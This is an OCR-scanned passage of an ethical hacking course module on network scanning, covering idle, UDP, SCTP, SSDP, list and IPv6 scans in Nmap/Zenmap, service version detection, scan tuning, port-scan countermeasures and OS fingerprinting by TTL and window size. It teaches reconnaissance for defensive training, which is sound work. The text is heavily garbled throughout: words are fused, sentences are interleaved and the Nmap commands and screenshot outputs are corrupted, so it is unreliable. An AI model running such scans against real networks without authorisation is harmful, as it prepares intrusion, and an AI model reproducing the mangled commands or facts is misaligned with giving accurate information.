number, whichincreasesbyone for
every packet the zombiewill now use its next availableIPID,
transmission, i.e., 31338(X
+1).
IdleScan:Step 2.2(Closed Port)
that the porton the targeti s closed.Subsequently,
‘Assume on receivingthe SYNpacket
fromthe attacker(you),the targetwill respond with an RST,
andthe zombie will remain
idlewithout taking
anyfurtheraction.

Zombie
Figure3.62:
Porisclosed
Step3
Now,followstep1 againto probe
the IPID number.
Ito
Probe B
Response:
s+

iPiD-31539
ACKPacket

RSTPacket
IPIDincremented
by
2sincestep1,
0 port80mut beopen

Figure3.63 ean: Step3

Senda SYNÂ¥ACK packetto the zombie, and it will respond with an RSTpacket containing
sent an RST
responds
port
the IPID.Assumethat the
packet
target;
then,
number
to the
1. the
with an RSTpacket
on the target
theIPID
was open andthat the zombiehasalready
is increased
to the attackerusing its next IPID,
by Now, zombie
i.e., 31339(X+ 2).
Consequently, the IPID is increasedby2, whichimplies that the port on the target
machinewas open. Thus, using an idle scan,an attackerc an find out the open portsand
serviceson thetargetmachinebyspoofing his/her IPaddress with a zombie’s
IPaddress.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UDPScanning

Mnretecn
eo

"manne

witha
worres
‘Open Thesptemdoesnot
spend mesa

UDPScanning
Scanning
UDPRawICMPPortUnreachable
UDP
port
scanners TCP. use the UDPprotocol
UDPscan,TheUDPprotocol
senda packet
insteadof
can be more challenging
Thereis no three-way
to use thanTCPscanning
but you cannot determinewhetherthe hostis alive, dead,
handshake
because for
the
youcan
or filtered. However,
you can useone ICMPthat checks foropenor closedports.I fyou senda UDPpacket to a port

an
without application boundto it, the IPstackwill return a n ICMPportunreachable
anyportreturns an ICMPerror, it will beclosed,
open or filteredthrough thefirewall
leaving
packet.
the portsthat did not answer if they
If
a re

[Are youopenon UDPPort292

‘7. xK<
Is
oe

i f por an ICP ort

Closed,

Attacker unreachable
message is received
103.64:UDPscanning
Thishappensbecauseopen portsdo not have to sendan acknowledgement to
in response a
probe,
andclosedportsare not even required
to sendan error packet,
UDPPackets
Source:https://nmap.org
Whenyou senda packet to a closedUDPport,most of the hostssendan TCMP_PORT_UNREACH
you can determinewhethera portis not openif UDPpackets
error. Thus, or ICMPerrors are not
guaranteedto arrive. Thus,UDPscannersof thistypemust implement retransmissionof packets

Module 0 2 ical andCountermensores

Mackin ©by E-Comel
Copyright
that appearlost.UDP
scanners
aUDP
Usedto perform scan, interpret losttrafficas openports.In Zenmap,
the ~sU optionis

Command:[ nmap
- -v 10.10.1010

Hosts
|| |
Services nmapOutputPorts/MortsTopelogy
Host
Detsis_ Sc

® 10701010 Starting Nesp

7.78

( nttp
Ping Scan 11:07
at
p.0re ) at 2019-06-67

eed
Initiating UOPSean at 2

Discoveredopen port137/udp10.10.10.10 on

isup
Reapscan report for 10,10.10.18
fost (0.008 latency

PAC
Addcess:00:0C:29:79:02:89(Wware)
fn

2 IP ase
Neap-sones

In addition,this scanningtechnique
3.65:
Figure
is slowbecause
UDP scanning
using Zenmap
it limitsthe ICMPerror messagerate as a
formof compensation to machinesthat applyRFC1812section 4.3.2.8.A remote hostwill
require accessto the raw ICMPsocketto distinguish
closedportsfromunreachable ports,
()andWRITE()Scanning
UDP RECVFROM

Although
non-root users cannot read unreachableport errors directly,
Linux informsyou
Indirectly
whenit receives messages.
=
Example:
For example,
a secondwrite () calltoa closedportwill usually
fail. Various scanners,
suchas Netcatand Pluvialpscan.c, perform recvfrom () on non-blocking UDP
sockets,
and
they
usually
return
EAGAIN ("TryAgain," errno 13)fthe
ical
has

andCountermensores
Mackin ©
ICMP
error
by E-Comel
Copyright
 not been receivedor ECONNREFUSED ("Connection refused," errno 111)
otherwise.Thistechnique
is usedfor determining
openportswhennon-root users use ~

1u (UDP).
‘Advantage:
Rootuserscan
also scan) to
force
this
use the -1 (lamer
UDP option process.

‘The
handshake.
can exceed
However,
regard
UDPscan is lessinformalwith

to
if ICMPis responding a
to an open port because

of
there is no overheadof TCP
eachunavailableport,thetotal number frames
that from a TCPscan. Microsoft-basedOSsdo not usuallyimplement any ICMPrate
limiting;
hence, efficiently
thisscanoperatesvery on Windows-based devices.
Disadvantage:
TheUDPscan provides
portinformationonly.If additionalinformation the
the scan must be supplemented
option(-0)
with a version detection of
s can (~sV)
version is needed,
or the OSfingerprinting

TheUDPscan requiresprivileged
the appropriateuser permissions this
access;hence, scanoptionis only available with
on systems

Most networkshavemassive amounts of TCP

oftraffic;
low.The UDPscan will locateopen portsandprovide
informationfor identifying
successful
as a result,the efficiencythe UDPscan is
the securitymanagerwith valuable
attackerinvasions on open UDPportsowing to spyware
applications, and
horses,
Trojan
other
malicious
software.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SCTPINIT Scanning

ning(Open)

te
SCTPINIT Scanning
StreamControlTransport Protocol(SCTP)is a reliablemessage-oriented layer
transport protocol.
as tothe
TCP
and
UDPits multi-streamin
Itis used an alternative
of TCP andUDP.SCTP are
similar
tothose
activities
i s specifically
protocols,
usedto perform
as characteristics
multi-homingand

TRANsport
method,
discovering
VoIP, Signaling
SomeSCTPapplications include
(SS7/SIGTRAN)-related
as shownin the screenshot
services. SCTP
below.
IP telephony,and
associationcomprises
7/SIGnaling
System
a four-way
handshake

Po eee)

client Assciaton fourway

3.6; SCTP
Figure
server
handshake

ical andCountermensores
Mackin ©by E-Comel
Copyright
InSCTP,the INITscanis performedquicklybyscanningthousands of portsper secondon a fast
networknot obstructedbya firewalloffering
a stronger sense of security.
TheSCTP INITscan is
verysimilarto theTCPSYNscan;comparatively, itis alsostealthyandunobtrusive, as it cannot
complete SCTP hencemaking
associations, the connection half-open
Attackerssend INIT chunkto the targethost. If the port is listening
or open, it sendsan
acknowledgement as an INIT#ACK
chunk,
INITChunk

Attacker Target
Host

If thetarget
367:
Figure
is inactive andit
when
SCTP

listening,
is not
isacknowledgement
INT sean result a

thenit sendsa n
(Open)
port stening
as an ABORT
chunk,

>

Attacker
Figure
3.68:SCTP
‘ABORT
Chunk

INTscan resultwhena ports nat listening

Target
(Closed)
Host

Afterseveralretransmissions,
if thereis no response,thenthe portis indicatedas a filteredport.
Theportsalsoindicated
exception
SCTP
(type
INITscan,
asa filteredportifthe targetserver
3,code0,1,2,3,9,10,or 13).In Zenmap, responds
with an ICMPunreachable
the ~s¥optionis usedto perform the

Advantages:
'

_INITscan
clearly
statesdifferentiate
between
can
various
open, portssuchas closed,
andfiltered

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Poretlel
Completesresolution
hosts
stList,
ONS
of
1
Ini's2"sconnes ports on 10,20.10.10a re ¢iatered

Nesp
gone:
scores |
7
1 IP anned

2K)
in 2.38

Reve: 4

Figure
3.69:SCIPINITscan in Zenmap

3
Module 207
Page tical andCountermensores
Making Copyright©
by Comet
 SCTPCOOKIEECHOScanning

ae
&=--B
SCTPCOOKIE ECHO Scanning
SCTP COOKIE
ECHO
ECHO
of
target,
scanis a more advanced

andtarget
COOKIE chunkto the
portit if the
type scan.In thistypeofscan,attackers
onto the portand youwill not receive anyresponse
is open, will silently
sendthe
dropthe packets
fromthetarget.If the targetsendsbackthe
ABORT chunkresponse, thenthe portis considered as a closedport.TheCOOKIE ECHO chunkis
not blocked
the SCTP COOKIE scan.
bynon-stateful
ECHO
firewallrulesetsas i n the INIT
scan, In Zenmap,
Onlyan advanced
the ~8z optionis usedto perform
IDScan detect
the SCTP COOKIE
ECHO
scan, COOKIE
ECHOChunk
>
NO Response
attacker Target
Host
3,70:SCTPCOOKIEECHOscan
Figure result whenporti s open

COOKIEECHOChunk

‘ABORT
Chunk
Attacker
Figure3.71:
SCTPCOOKIE
ECHO
sean
Target
recutwhenpote closed
Host

Advantages:
Theportscanis not as conspicuousastheINIT scan,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Disadvantages:
SCTP COOKIE ECHO scancannot differentiateclearlybetweenopenandfilteredports,
andit showsthe outputas open [filtered
i n bothcases.

Command |rmap 52 -v 1010.10.10

Hoss]
4Host
Senices
| OutputPorts/Hosts Topology
Nmap
10:10.10.10
femep-sZ-»
Host
Detatt Scan

Det
® 10101010 Starting map 7.70 ( nttps://nmap.org ) at 2019-06-07
eh Standard Tine
Initiating ARP Ping Scan at 11
Scanning10.19.10.10 [1 port

Initiating SCTPCOOKTE-EOHO Scan at 11:12

Scanning19.19.10.10 [52 por
2 total port
10.19.10.10
oe.
0,005 latency

anes in 2-53

Figure3:72:SCTP
COOKIE-ECHO
scan inZenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SSDPandList Scanning
SSDP
Seanning

Debacle
wera conclon UP ott nl ee
‘finmomes
ONsey nto

performed
(a Arevre reshton'
rere am
ery

SSDPand List Scanning

Scanning
‘SSDP
Simple
ServiceDiscovery
machines generally
communica
(SSDP)
Protocol is a network that
protocol
whenqueryingthemwith routableIPv4or IPv6multicastaddresses.
controlscommunication forthe UniversalPlug andPlay(UPnP)
TheSSDP
feature.It generally
with
service
workswhen
the machineis not firewalled;
however, it can sometimes work through a firewall.TheSSDP

will
service
query
sent
information
about
UPnP orIPV6
respond
addresses.
to a

associated
with
it.
the This
response
uses
over IPv4

scanning
feature
broadcast
Theattacker SSDP
includes
to detect

that to buffer
overflow
UPnPvulnerabilities mayallowhim/her launch or DoSattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 3.73 UPnPSSOP
Figure M-SEARCH
in Parco Securty

attackermayuse the UPnPSSOPM-SEARCHinformationdiscovery

‘The tool to checkwhetherthe
machineis vulnerableto UPnPexploits.
TheUPnPSSDP M-SEARCH informationdiscoverytool
gleans informationfromUPnP-enabled as showni n the figure.
systems,
ListScanning.
Ina listscan,the discovery
printsa listof IPs/Names
showsall IPaddresses
without actually
scanned―
as “not
pingingor scanning
(0hostsup). Bydefault,
A
of the active networkhostis indirect. list scansimplygenerates
the hosts.A sa result,
and
the list scan
a reverse DNSresolutionis still
cartiedout o n eachhostbyNmapto learntheir names. In Zenmap, the ~st optionis usedto
perform a list scan.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Target101010.
Command:[map a 10.10.1010
Prete

Wo Services
Nimap Output Hot
Pons/Hort: Topelogy Oetit
Data

Advantages:
using 3.74: st
Figure sean Zenmap

=
Allis scancan perform sanitycheck.
a good
‘The

detects
list
primarily
file. It incorrectly
scan
defined
addresses
command
or option.
repairsthedetected
IP i n the
e rrors to run any “active
line
‘can.
i n an

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPv6Scanning CEH
PvncrasestheP adress
32
bits
128
bts
sie from to to support
more levels
ofares hierarchy

‘tachers
can use the
6 to
option In Zenmap

IPV6 Scanning
spacefrom32 bitsto 128 bitsto supporthigher
IPV6increases the size of the IP address levelsof
the addressing hierarchy. Traditional networkscanningtechniques are computationally less
feasiblebecauseof the larger searchspace (64bits of hostaddressspace, or 2°addresses)
provided byIPV6in a subnet.Scanning theIPV6networkis more difficultandcomplex compared
Attackers of tools
to IPv4. Additionally,

addresses on
a number scanning do not support
needto harvestIPV6 fromnetworktraffic,
pingsweeps IPv6networks.
recorded
andotherheaderlinesi n archivedemailor Usenetnews messagesto identify
logs,or "Receivedfrom"
IPv6addresses for
subsequent portscanning.However, scanning a n IPv6network provides a largenumber ofhosts
subnet;
i na
can one
subnet
host,
can
if an attacker compromise
localmulticastaddress if the hostsnumbers
he/she probe
a re sequential
the “all
or use any regular
hosts"link
scheme. An

needs
to
attacker
subnet.
i n that
analyze 2 addresses to verify
if a particular
At a conservative rate of one probe
openservice is runningon a host
per second,
sucha scan wouldtakeabout 5

to can
billion years complete.
optionis usedto perform
Attackers use Nmap
the IPV6scan.
to perform
IPv6scanning.In Zenmap, the ~6

3.75:
Figure
|Pv6 ScaninZenmap,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ServiceVersionDiscovery

series
information
theirversons
aboutrunning
onatarget system
and

attackers
to
to the
‘of
Slows determine ued
systemparticular
target explots|

Service Version Discovery

Everyportis assigned
a specific
service, andeveryservice hasits own version. Someversions of
the protocolsare insecure,and theycan allow attackersto compromise the machineby
exploiting
this vulnerability.
Serviceversion detectionhelps
attackers
to obtain information
aboutthe running services andtheir versions on
targetsystem.
a Byobtaining accurate service
version numbers,
Forexample, the
an attacker
can determine whichexploits targetsystemis vulnerable
whenthe attackerdetectsthe SMBv1protocol
to.
as a runningservice on the target
Windowsmachine,

of
then he/she
attack
combination with
can easily
theeternalblueanddoublepulsar
perform
help
backdoor
ransomware
a WannaCry
in Metasploit.
the

Theversion
Nmap technique
the
from nothingof
detection
the
TCP
and
UDP
various
services
is

matching
service-probes
but examination
database
are used
forquerying
expressionsfor recognizingandparsing responses.In Zenmap,
the -sV
ports.Theprobes
and
optionis usedto detect
service versions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ©
Zewm
Sean ToolsBrofle Help
Target10.10.1010 Profile:

[hmap2 10.10.1010
Commané:

05
Hoss]

« Host
Senices
| Nmop
OutputPerts/Hosts Topology
map -3V
Host
Detals. Scant

Details
® 10.10.1010 Starting Ninap7.70
nap scan
Host {5 up (0.00145latency)
(
https://nmap.org
report for 10.40.10.10
) at 2019-06-10

Nokshown: 996 closedports

To SIALESen aston,
135/%ep open msrpc Ricrosofe Window
139/%epopen netDios-ssn Microsoft Windows
445/tep open microsoft-ds Microsoft Kindows
Inicrosoft-as (workgroup:
WORKGROUP)
5357/tep open htt Ricrosoft HITPAPTnttod
2.0 (SS0°/UPRP)

results at nttps://nnap.org/subed'
incorrect
1 host up) scenned 13.88 in

03
Module 245
Page tical andCountermensores
Making Copyright©
by Comet
 ScanTimeReductionTechniques
Nmap
performance
|© tntimap, accuracy
and
can
beby achievedreducing
the scan ining

Time
Reduction
Techniques
Scan

@ oe once tes
vv«08e
© snap

©cotinize TringParameters @ concurrent

cece nance,
Nmap

©sep2rte snd
UO
Optinize Sans @ seanrom a
Favorable
Network Location

@ rcs a

‘Nmap
ScanTime Reduction Techniques
performance
In Nmap,
and
accuracytakehigh
the longscantime, Theimportant
andthis onlyachieved only reducing
priority,
forreducing
techniques the scantime are asfollows: be by
=
OmitNon-criticalTests
Whileperforming
the Nmap
scan,the time complexity
can be reducedbythe following
methods:
©

©
Avoiding
an intense scan only
Thenumberof portsscanned
if
a minimalamount
c an be limitedusingspecific
is
commands.
ofinformation
required,
Theportscan (sn) can be skippedif andonlyif one hasto checkwhetherthehosts
are onlineor not.
© Advancedscan (-sC,sv,
types and ~a)c an beavoided.
‘traceroute,
©. TheDNSresolution shouldbeturnedon onlywhenitis necessary.
Optimize TimingParameters
Nmap
Tocontrolthe scanactivity, the ~" optionforscanningrangingfromhigh-
provides
Thiscan be extremely
levelto low-leveltimingaggressiveness. usefulfor scanninghighly
filterednetworks.
Separate
andOptimize
UDPScans
manyvulnerableservicesuse theUDPprotocol,
‘As scanning theUDPprotocol isvital,and
it should
be scanned separately, as TCPscanshavedifferent performance requirements
Moreover,
and timingcharacteristics. the UDPscan is more affectedbythe ICMPerror
rate-limiting
compared to
the TCPscan.

03
Module Page216 ical andCountermensores
Mackin
©
Copyright
by E-Comel
Upgrade
Nmap
Itis always
advisableto use the upgraded
version of Nmap
as it contains manybugfixes,
importantalgorithmic enhancements,and high-performance featuressuchas local
networkARPscanning,
ExecuteConcurrentNmap Instances
RunningNmap the wholenetwork usually
against makesthe system slowerand less
efficient.Nmapsupportsparallelization
andit can alsobe customized according to
specific
needs.It
a larger
scanning becomes
very of reliability
while
efficientbygetting
group.Theoverallspeed
manygroups andrunning themsimultaneously.
an idea the network
ofthe scancan beimprovedbydividing
it into

Scanfrom a FavorableNetworkLocation
Itis
always
torun host'sto
internalnetwork,
whenperforming
thewhile
advisable Nmap fromthe localnetwork
as it offers defense-in-depth
target i n the
Externalscanning is obligatory
security.
firewalltestingor whenthenetworkshouldbemonitoredfromthe
externalattacker'sviewpoint.
IncreaseAvailableBandwidthandCPUTime

By
is
the
increasing
Thisdone
available
byby a
can be
controlled
or
CPU
new
datapower,time
line
bandwidth

algorithms,running
installing
its own flooding
control
congestion
or
theNmap
stopping
so
scan
any
can bereduced.
applications.
that network
Nmap
can be
prevented. TheNmap
Thisimprovesits accuracy. bandwidthusagecan be tested by
it
running i n the verbosemode~v.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PortScanning
Countermeasures

| sa sedated potest
fread
‘unporscanning aansthotsonthe
t ools ter a l lIMP messagesinbound
MP

ropery
detects
porscanningactvty, Unreachabe
messages) atthe
firewalls
androutes

rowtinemettod salableports

trae ute
uebadrat tere
||FAY asco
Ere opting es

Port ScanningCountermeasures
‘As previously,
discussed a large
portscanningprovides amount of usefulinformation
to the
attacker,suchas IPaddresses, hostnames,openports,andservicesrunningon ports.Openports
offera n easymeans fortheattacker
specifically to breakinto thenetwork.
However,thereis no
cause for concern,provided that you secure your system portscanningby
or networkagainst
adopting
the followingcountermeasures:
=
Configure andIDSrulesto detectandblockprobes.
firewall
The firewall shouldbe capable of detecting probes
sent bythe attackersusingport
scanningtools. It shouldnot allowtraffic to passthroughit after simply
inspecting the
TCPheader.Thefirewallshouldbeable to examine the datacontainedi n eachpacket
beforeallowingthetrafficto passthrough it.
Run the portscanningtoolsagainst hostson the networkto determine whetherthe
firewallaccurately detectsthe portscanningactivity.
Somefirewallsdo a better jobthan othersi n terms of detecting stealthscans. For
example, many firewallshavespecific optionsto detectSYN scans, while others
completely ignore FINscans.
Ensure that the router,IDS,and firewall firmwareare updated with their latest
releases/versions.
Configurecommercial firewallsto protectyour networkagainst
fastportscansandSYN
floods.You can run toolssuchas portentryto detectand stopport scan attempts on

Linux/UNIX
systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Hackersuse
OS.Thus, tools
Nmap
suchas andperform
it is importantto employ
(https://www.snort.org)
OSdetectionto
intrusion detectionsystems
is an intrusion detection andprevention
sniffofa
thedetails remote
i n suchcases. Snort
technology thatis very
useful,mainly becausesignatures are frequently availablefromthe public authors.
Keep as few portsopenas possible
andfilter the rest,as the intruder will tryto enter
through anyopenport.Usea custom ruleset to lockdownthe network, blockunwanted
filter
portsat the firewall,
1745,and3268,
and the following ports: 135-159, 256-258, 389,445,1080,

Block
unwantedportsthe
services runningon the andupdate service versions.
Ensurethatthe versions of services running on the portsare non-vulnerable.
BlockinboundICMPmessage types andalloutboundICMPtype-3 unreachable
messages
at borderrouters arranged
in front of a company’s
main firewall

tryto perform
‘Attackers andsendpackets
source routing to the targets(which
may not

reachable
be
Hence,Internet)
using
host
via the
it is necessary
to ensure
an intermediate thatcan interact withthe
that your firewalland router can target.
blocksuchsource-
routing
techniques.filtering
Ensurethatthe mechanism usedfor routingand at the routers andfirewalls,
respectively,
cannot be bypassedusing a particular
source port or source-routing
methods.
Testyour IP addressspaceusingTCPand UDPportscansas well as ICMPprobes
to
determinethe networkconfiguration
andaccessible
ports.
andanti-spoofing
thattheanti-scanning
Ensure rulesare configured.
Ifacommercial
firewallisin use,thenensure that
©

©
with
Itis patched the latestupdates
Ithas correctly
definedantispoofing
rules
0. Its fastmodeservices are unusablei n CheckPoint Firewall-1environments

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Tools BD
Seanning osciscereryGamercarting?
(05Fingerprinting)

Scanning
Beyond
IDSandFirewall

OSDiscovery
(Banner
Grabbing/OS
Fingerprinting)
An attackerusesOSdiscovery or banner grabbing
techniquesto identify
networkhostsrunning
and
OS
application versions
andits tools,
its types, exploits.
with known
This
as wellas useful
sectionintroducesyou to banner
countermeasuresthatyou can adopt against
it. grabbing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OSDiscovery/Banner
Grabbing
target
oyster.
There
two
ar typesofbannerpabbingatv
the
isthemethod usedto determine
andpaseoperating
system on remote
running

AotiveBannerGrabbing BannerGrabbing
Passive

Specay
crafted
packets
resent
remote
Sanner
grabbing
from tothe OSand erormestogs

etermine
‘he
ndae
the
are than
responses
the08
with database
compared to te
Siting
5, So
networt

implementation
atheTCP/IP
sobbing
stack
rom
page Sonne ertensins

8 Discovery/Banner
Grabbing
Banner
grabbing,
“OS
a remotetarget
probability
or fingerprinting,―
system.
is a methodusedto determinethe OS
It is an importantscanningmethod,as theattacker
of successif the OSof the targetsystemis known(many
that is running on
will havea higher
vulnerabilitiesare OS-
The attacker
specific). can then formulatean attackstrategy basedon the OSof the target
system,
Thereare two methodsfor bannergrabbing:
spottingthe bannerwhile tryingto connect to @
service, suchas an FTPsite, and downloading
the binaryfile/bin/lsto checkthe system
architecture.
more advanced
‘A fingerprinting
technique dependso n stackquerying,whichtransfersthe

packetsto the networkhostandevaluates them bythe reply.Thefirststack-queryingmethod

designedwith regardto the TCPmodeof communication evaluatesthe responseto connection
requests,
Thenext method,
number identifies
knownas initial sequence
generators
random
number(ISN)
found i n the TCPstack.
analysis, the differences
in

ICMP
response
analysis
method an of
fingerprint consistssending
is another usedto
messagesto a remote hostandevaluating
the reply.
OS.It ICMP

of bannergrabbing
Two types techniques
are described
below:
=
ActiveBannerGrabbing
bannergrabbing
‘Active applies that an OS'sIP stackhasa uniqueway of
the principle
respondingto specially
crafted TCPpackets.
This happensbecauseof different
thatvendorsapply
interpretations whileimplementing stackon a particular
the TCP/IP

ical andCountermensores
Mackin ©by E-Comel
Copyright
5. In active bannergrabbing,theattackersendsa variety packets
ofmalformed to the
remote host, andthe responsesare comparedwith a database. fromdifferent
Responses
of in
0 vary becausedifferences TCP/IP
Forinstance,the scanningutilityNmap
stackimplementation.
u sesa series of nine tests to determinean OS

or grabbing.
fingerprintbanner
bannergrabbing
Thetests listedbelowprovide
attack,as describedat www-packetwatch.net:
some insights into an active

©

port ECN-Echo
Test1: ATCPpacket
enabled
sent
withtheSYNand flags is to an open TCP

Test2: ATCPpacket
withno flags
enabledis sent to an openTCPport.Thistypeof
packet packet,
is @NULL

Test 3: A TCPpacket
withthe URG,
PSH, andFIN flags
SYN, enabledis sent to an open
TCP
port.
Test4:ATCPpacket withthe ACKflagenabledis sent to an open TCPport.
Test 5: A TCPpacket
withthe SYNflagenabledis sent to a closedTCPport.
Test6: A TCPpacket
withtheACKflag
enabled
i s sent to a closed
TCPport.
Test7: ATCPpacket
withtheURG, andFINflags
PSH, enabled
i s sent to a closedTCP
port.

an A
Test 8PU (PortUnreachable):UDPpacketis sent toaclosed UDPport.Theobjective
is to extract “ICMPportunreachable―
message fromthe targetmachine
Test9 TSeq(TCP Sequence abilitytest):Thistest tries to determinethe sequence
patterns
generation of the TCPinitialsequencenumbers(also knownas TCPISN
sampling),
the IPidentificationnumbers(also knownas IPIDsampling), andthe TCP
timestampnumbers.It sends six TCP packets
with the SYNflagenabled to an open

TCP
port.
Theobjective ofthesetestsisto find patterns
inthe intial sequenceof numbersthat the
TCPimplementations chosewhileresponding to a connection request.They c an be
categorized into groups, such as traditional 64K (many old UNIX boxes),random
increments (newer versions of Solaris,IRIX,FreeBSD, Digital
UNIX,Cray,andmany
others),
or true random(Linux 2.0.*,OpenVMS, newer AIX, etc).Windowsboxesuse a
"time-dependent" modeli n whichthe ISN is incrementedbya fixed amount for each
occurrence.
PassiveBanner
Grabbing
Source:https://www.symantec.com
Likeactive bannergrabbing, grabbing
passivebanner alsodepends
on thedifferential
implementation
of the stackandthe various waysi n whichan OSresponds to packets.
insteadof relying
However, on scanning thetargethost,passive fingerprinting captures
packets
fromthe targethostvia sniffing
to study
telltalesignsthat can reveala n OS.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 includes:
bannergrabbing
Passive
Bannergrabbingfrom error messages:
Errormessagesprovideinformation,
suchas
of
type server,typeof OS,andSSLtoolsusedbythe target
Sniffing
network
the
traffic: Capturing
andanalyzing
remote system.

fromthetargetenables
packets

Banner
to
an attacker determinetheOSusedbythe remote system.

grabbing Looking help

from pageextensions: for a n extensioni n the URLmay
in
the version.=>
determiningapplication
platform, IISand Forexample, .aspx server Windows

Thefour areas that typically

determinethe OSare givenbelow:
© TTL(time to live)ofthe packets:
Whatdoesthe OSsetsas theTimeTo Liveon the
‘outboundpacket?
©

©
Window
Whether
Size:
isFragment)
(Don’t
the DF
size
Window set
by
the
What the 0S?
theOSset theDFbit?
bit is set: Does
©
TOS(Type ofService):
DoestheOSset the TOS, andif so,whatsettingis it?
Passivefingerprinting
is neither fullyaccurate nor limited to thesefour signatures.
However, one can improveits accuracy bylooking and combining
at severalsignatures
the information.The following
is an analysis
of a sniffed packet
describedbyLance
Spitzner hispaper passive
in fingerprinting
on

(hetps://www.symantec.com/connect/articles/passive-fingerprinting):
04/20-21:41:48.129662129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 1D:56257
***PS4A* Seq: 0x9DD90553
Ack: 0xE3C65D7 Win: 0x7D78
According the following
to thefour criteria, are identified:

o TTL:45
Window
32120
Size:0x7D78(or
DF:TheDFbit is set
decimal) in

© TOS:0x0
Compare
of
thisinformationwith a databasesignatures.
original
TIL: TheTLL fromthe analysis
is 45. Thethrough
packet
went 19 hops
to getto
the
the target,
so
packet sets
it
TTL
original
to
the
from a Linux or FreeBSD
database).
addedto the
TTL, that
appears
the
user
sent
64.Basedon this
box (however,
ThisTTLconfirms
it
more system
it byimplementing
signatures needto be
a traceroute to the remote
host.If the trace needsto be performed stealthily,
the traceroute TTL(default 30 hops)
can be set to one or two hops fewerthan the remote host(-moption). Settingthe

ical andCountermensores
Mackin ©by E-Comel
Copyright
 traceroute in thismanner reveals (including
thepathinformation provider)
the upstream
without actually contactingthe remote host.
WindowSize:In this step, the window sizes are compared. Thewindowsize is another
effectivetool for determining preciselywhatwindowsize is usedandhow often it is
changed. In the previoussignature, the windowsize is set at 0x7078,
whichis thedefault
windowsize usedbyLinux.In addition,FreeBSD andSolaristend to maintain the same
windowsize throughout a session. However, Ciscorouters andMicrosoftWindowsNT
windowsizes
constantly
change.
the initial three-way size when
handshake
Thewindow is moreaccurate
(dueto TCPslowstart),
measured after

use the OF bit set;hence,this is of limitedvalue.However,this

bit:

DF Most systems
makesit easier to identify
a few systems that do not use the DFflag(such a s SCOor
OpenBsb)
TOS:TOSis alsooflimitedvalue, as it seemsto bemore session-based
thanOS-based. In
otherwords,i t is not so muchthe OSas the protocol
usedthat determinesthe TOSto a
large
extent.

Usingthe information
obtained fromthe packet,
of the
specifically TTLand
compare the resultswith the databasesignatures
fone can
some degree ofconfidence(inthiscase,Linuxkernel2.2.x).
thewindowsize,
anddeterminethe OSwith

Passivefingerprinting,like active fingerprinting,

that build their own packets
signatures as the OS.Second,
windowsize,DF,or TOSsetting
hassome limitations.First,applications
(e.g., Nmap,Hunt,Nemesis, etc.)will not use the same
simple
it is relatively for a remote hostto adjust the TTL,
on the packets.

fingerprinting
Passive hasseveralotheruses. Forexample, attackers
can use stealthy
fingerprinting
to determinethe OSof a potential
targetsuchas a webserver. Auser only
needsto request a web pagefromthe server andthen analyze the sniffertraces. This
bypasses the needfor usingan active tool that various IDSsystemscan detect.Passive
fingerprinting
alsohelps i n identifying
remote proxyfirewalls.It maybe possible to ID
proxyfirewallsfromthe signatures as discussed above,simplybecauseproxyfirewalls
passivefingerprinting
rebuildconnections for clients.Similarly, can be usedto identify
roguesystems.

will passive
Note: We discuss
WhyBannerGrabbing?
banner
grabbing in latermodules.

attackeruses banner
‘An to
the
grabbingidentify OSusedo n the targethostandthusdetermine
that mightwork on that systemto carryout further
the systemvulnerabilitiesand exploits
attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Identify
Target
System
OS

theste ofpaca
naescon
"a Aachen identityth 0
Uve(Tt) andTe window nthe ead
the rst TEP

| switcoptre
ung fromthe
generated
response target machine pice i t

How to Identify Target System OS

Identifying
the targetOS is one of the important
tasksfor a n attackerto compromisethe target
network/machine.In a network, are implemented
various standards to allowdifferent
OSsto

as IP,TCP, UDP, etc. Byof

communicatewitheachother.Thesestandards

analyzing
detailsof theOS.Parameters certain
governthe functioning
parameters/fields
suchasTimeto Live(TTL)
i n these
various protocols
one can reveal
protocols,
andTCPwindowsize in the IPheaderof
such
the

a and TTL
the first packet
in a TCPsession helpidentify
the OSrunningon the targetmachine.The field
determinesthe maximum time that a packet can remain in network, the TCP windowsize
determines the lengthof the packetreported.Thesevaluesvary amongOSs, as describedi n the

following
table:
2.4
(Kernel
and
2.6) |
Operating
Linux
System TimeToLive
64
TCPWindowSize
5840
Google Linux 64 5720
FreeBsD 64 65535
OpenBSD 64 16384
Windows
95 32 8192
Windows2000 128 16384
WindowsXP 128 65535
Windows98,Vista,
and7 (Server
2008) 128 8192
(CiscoRouters)
10512.4
255 4128

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Solaris
7
AK 43 64
able3 3: TTand
L TCPWindow see values
for OS

Attackers
c an use various tools to performOSdiscoveryon the targetmachine,including
Wireshark,Nmap,Unicornscan, and NmapScript Attackerscan also adoptthe IPvé
Engine.
fingerprinting
methodto grab the targetOSdetails.
0 Discoveryusing
Wireshark
Source:https://www.wireshark.org
To identify sniff/capture
OS,
the target the responsegenerated
fromthe target
machineto the
machine
request-originated usingpacket-sniffing toolssuchas Wireshark,
etc.,andobservethe
TTL andTCP windowsize fieldsi n thefirst captured
TCPpacket.Bycomparing thesevalueswith
thosein the abovetable,
the
youcan determine targetOSthat hasgenerated
the
response.

Possible
OSisWindows

3.77:Wiveshack
Figure sereenshot
TIL is
showingvalue
(Possible
OS Windows}

ical andCountermensores
Mackin ©by E-Comel
Copyright
 screenshotshowing
3.78:Wireshark
Figure
value
TT L
(Poelble
OSis
 OSDiscovery and Unicornscan
using Nmap

8 Discovery andUnicornscan
usingNmap
0 Discovery
usingNmap
Source:https://amop.ora
To exploit
the target,i tis highly essentialto identify the OSrunning on the targetmachine.
Attackers can employvarious toolsto acquirethe OSdetails of the target.Nmap i s one ofthe
